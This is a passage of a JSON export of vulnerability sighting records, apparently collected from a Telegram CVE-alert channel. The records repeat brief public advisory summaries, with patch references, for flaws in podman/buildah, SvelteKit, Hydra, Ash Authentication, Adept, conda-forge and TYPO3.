"RHSA-2025:1186", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "9331a49c-f23b-4dc7-90e8-4cc21127d641", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1910", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "5e7242df-91a1-4fba-8c34-bee7142356e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2441", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "e44ef2e1-81db-43f2-8e7f-99c68a0c020e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2710", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "1efade08-ba44-4239-9891-ae79e854fbba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1275", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "f5e9fdc5-bf1c-42a2-aafa-91775b7ac6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F5F-XGRJ-97PF", "type": "published-proof-of-concept", "source": "Telegram/909Vqfy1t-GN-jmnJRhonTHruzsnwKWBWvcbC9dRm7P3pmc", "content": "", "creation_timestamp": "2026-01-02T18:47:00.000000Z"}, {"uuid": "9e19d561-2834-4791-84f6-3cdb3845eb41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q87-84JW-CJHP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11940", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32388\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.20.6 , unsanitized search param names cause XSS vulnerability. You are affected if you iterate over all entries of event.url.searchParams inside a server load function. Attackers can exploit it by crafting a malicious URL and getting a user to click a link with said URL. This vulnerability is fixed in 2.20.6.\n\ud83d\udccf Published: 2025-04-15T22:32:06.059Z\n\ud83d\udccf Modified: 2025-04-15T22:32:06.059Z\n\ud83d\udd17 References:\n1. https://github.com/sveltejs/kit/security/advisories/GHSA-6q87-84jw-cjhp\n2. https://github.com/sveltejs/kit/commit/d3300c6a67908590266c363dba7b0835d9a194cf\n3. https://github.com/sveltejs/kit/releases/tag/%40sveltejs%2Fkit%402.20.6", "creation_timestamp": "2025-04-15T22:55:39.000000Z"}, {"uuid": "238268c7-f0e2-4e45-b2a8-2884b7f22e57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-565G-HWWR-4PP3", "type": "published-proof-of-concept", "source": "Telegram/909Vqfy1t-GN-jmnJRhonTHruzsnwKWBWvcbC9dRm7P3pmc", "content": "", "creation_timestamp": "2026-01-02T18:47:00.000000Z"}, {"uuid": "bfcd3faf-c300-44fc-b962-dbc35df87080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHGF-2H8H-GGXV", "type": "published-proof-of-concept", "source": "Telegram/909Vqfy1t-GN-jmnJRhonTHruzsnwKWBWvcbC9dRm7P3pmc", "content": "", "creation_timestamp": "2026-01-02T18:47:00.000000Z"}, {"uuid": "3955e121-5ad0-4bf2-b8d3-7629ad9fb239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J7W7-965W-VJXW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11944", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32435\n\ud83d\udd25 CVSS Score: 2.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Hydra is a Continuous Integration service for Nix based projects. Evaluation of untrusted non-flake nix code could potentially access secrets that are accessible by the hydra user/group. This should not affect the signing keys, that are owned by the hydra-queue-runner and hydra-www users respectively.\n\ud83d\udccf Published: 2025-04-15T22:19:46.856Z\n\ud83d\udccf Modified: 2025-04-15T22:19:46.856Z\n\ud83d\udd17 References:\n1. https://github.com/NixOS/hydra/security/advisories/GHSA-j7w7-965w-vjxw\n2. https://github.com/NixOS/nixpkgs/pull/397919\n3. https://github.com/NixOS/hydra/commit/8d750265135b7e203520036a742afdf301b4013f\n4. https://github.com/nix-community/nix-eval-jobs/releases/tag/v2.28.1", "creation_timestamp": "2025-04-15T22:55:46.000000Z"}, {"uuid": "aebb8008-fc73-4840-8fc4-7a40c9c38062", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3988-Q8Q7-P787", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11949", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32782\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Ash Authentication provides authentication for the Ash framework. The confirmation flow for account creation currently uses a GET request triggered by clicking a link sent via email. Some email clients and security tools (e.g., Outlook, virus scanners, and email previewers) may automatically follow these links, unintentionally confirming the account. This allows an attacker to register an account using another user\u2019s email and potentially have it auto-confirmed by the victim\u2019s email client. This does not allow attackers to take over or access existing accounts or private data. It is limited to account confirmation of new accounts only. This vulnerability is fixed in 4.7.0.\n\ud83d\udccf Published: 2025-04-15T22:04:41.667Z\n\ud83d\udccf Modified: 2025-04-15T22:04:41.667Z\n\ud83d\udd17 References:\n1. https://github.com/team-alembic/ash_authentication/security/advisories/GHSA-3988-q8q7-p787\n2. https://github.com/team-alembic/ash_authentication/commit/99ea38977fd4f421d2aaae0c2fb29f8e5f8f707d", "creation_timestamp": "2025-04-15T22:55:53.000000Z"}, {"uuid": "5a55fde6-781a-48b5-b8e4-04f37491a44d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C7V-VCCV-CX4Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12762", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32958\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.\n\ud83d\udccf Published: 2025-04-21T20:45:40.082Z\n\ud83d\udccf Modified: 2025-04-21T20:45:40.082Z\n\ud83d\udd17 References:\n1. https://github.com/AdeptLanguage/Adept/security/advisories/GHSA-8c7v-vccv-cx4q\n2. https://github.com/AdeptLanguage/Adept/commit/a1a41b72cdf1bebfc0cf6d7b3a8350e6406b2220", "creation_timestamp": "2025-04-21T21:02:36.000000Z"}, {"uuid": "3f4e606f-be98-4f0d-9139-957e469f6ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28CX-74FP-G2G2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11953", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32784\n\ud83d\udd25 CVSS Score: 7.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: conda-forge-webservices is the web app deployed to run conda-forge admin commands and linting. In versions prior to 2025.4.10, a race condition vulnerability has been identified in the conda-forge-webservices component used within the shared build infrastructure. This vulnerability, categorized as a Time-of-Check to Time-of-Use (TOCTOU) issue, can be exploited to introduce unauthorized modifications to build artifacts stored in the cf-staging Anaconda channel. Exploitation may result in the unauthorized publication of malicious artifacts to the production conda-forge channel. The core vulnerability results from the absence of atomicity between the hash validation and the artifact copy operation. This gap allows an attacker, with access to the cf-staging token, to overwrite the validated artifact with a malicious version immediately after hash verification, but before the copy action is executed. As the cf-staging channel permits artifact overwrites, such an operation can be carried out using the anaconda upload --force command. This vulnerability is fixed in 2025.4.10.\n\ud83d\udccf Published: 2025-04-15T21:56:27.639Z\n\ud83d\udccf Modified: 2025-04-15T21:56:27.639Z\n\ud83d\udd17 References:\n1. https://github.com/conda-forge/conda-forge-webservices/security/advisories/GHSA-28cx-74fp-g2g2\n2. https://github.com/conda-forge/conda-forge-webservices/commit/141ed27617068debd150956341551df3a5a3807d", "creation_timestamp": "2025-04-15T22:55:57.000000Z"}, {"uuid": "5cac41d8-b138-41f3-8d10-169c630d5846", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFP7-79G7-89RF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12733", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23501\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: TYPO3 is an open source PHP based web content management system. In versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 TYPO3 is vulnerable to Improper Authentication. Restricting frontend login to specific users, organized in different storage folders (partitions), can be bypassed. A potential attacker might use this ambiguity in usernames to get access to a different account - however, credentials must be known to the adversary.  This issue is patched in versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.\n\ud83d\udccf Published: 2022-12-14T07:23:46.127Z\n\ud83d\udccf Modified: 2025-04-21T18:48:09.949Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-jfp7-79g7-89rf", "creation_timestamp": "2025-04-21T19:02:14.000000Z"}, {"uuid": "dd7b148c-7f7f-43ae-9b6f-00ec81a03792", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H78C-5CJX-JW6X", "type": "seen", "source": "Telegram/ApJ-QJ9lL1f0ZKW7BjjjKJ1R4V5b3d1wxuPvpjsu3iRxZ-U", "content": "", "creation_timestamp": "2026-01-02T18:47:34.000000Z"}, {"uuid": "82b658a6-f604-4c03-9b75-1642cf983ce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1207", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "5b4d06c1-d618-4e88-a2b9-ff1ba0986c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0878", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "d09b96d2-6c24-416e-9499-d112ce01708a", "vulnerability_lookup_origin": 